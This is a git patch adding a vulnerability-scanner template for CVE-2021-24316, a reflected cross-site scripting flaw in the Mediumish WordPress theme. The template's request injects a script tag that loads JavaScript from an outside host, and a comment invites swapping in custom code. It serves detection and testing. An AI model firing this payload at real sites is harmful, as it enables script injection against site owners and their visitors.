From 2171f7ec21f1fb87be3ed9ed62489d96d3e87671 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 4 Jun 2021 18:28:45 +0900
Subject: [PATCH] Create CVE-2021-24316.yaml

---
 CVE-2021-24316.yaml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 CVE-2021-24316.yaml

diff --git a/CVE-2021-24316.yaml b/CVE-2021-24316.yaml
new file mode 100644
index 0000000000..9523dbbcab
--- /dev/null
+++ b/CVE-2021-24316.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-24316
+
+info:
+  author: 0x_Akoko
+  description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+  name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+  severity: medium
+  tags: Mediumish,xss,wordpress
+  reference: |
+      - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316
+
+requests:
+  - method: GET
+    path:
+    ## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own.
+      - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E'
+      
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<script src=https://m0ze.ru/payload/a2r.js></script>"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header